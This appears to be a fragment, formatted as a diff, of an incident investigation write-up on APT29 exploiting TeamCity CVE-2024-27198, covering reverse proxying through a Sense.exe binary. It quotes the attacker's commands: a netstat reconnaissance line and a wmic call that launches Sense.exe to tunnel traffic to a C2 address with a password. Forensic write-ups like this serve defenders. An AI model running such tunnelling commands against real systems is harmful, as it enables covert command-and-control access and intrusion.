Investigating APT29 Exploiting TeamCity CVE-2024-27198

 C:\Windows\system32\cmd.exe /C netstat -an

-Reverse Proxy with Sense.exe
+### **Reverse Proxy with `Sense.exe`**

-At 16:46:35, I observed that Sense.exe was likely used as a reverse proxy (T1090.001, T1047, T1572) to tunnel the threat actor's traffic from JB01 to their C2 server (54.174.120.223:8443).
+At `16:46:35`, I observed that `Sense.exe` was likely used as a reverse proxy ([T1090.001](https://attack.mitre.org/techniques/T1090/001/), [T1047](https://attack.mitre.org/techniques/T1047/), [T1572](https://attack.mitre.org/techniques/T1572/)) to tunnel the threat actor's traffic from JB01 to their C2 server (`54.174.120.223:8443`).&#x20;

 wmic process call create "C:\Program Files\Windows Defender Advanced Threat Protection\Sense.exe -connect 54.174.120.223:8443 -pass M554-0sddsf2@34232fsl45t31"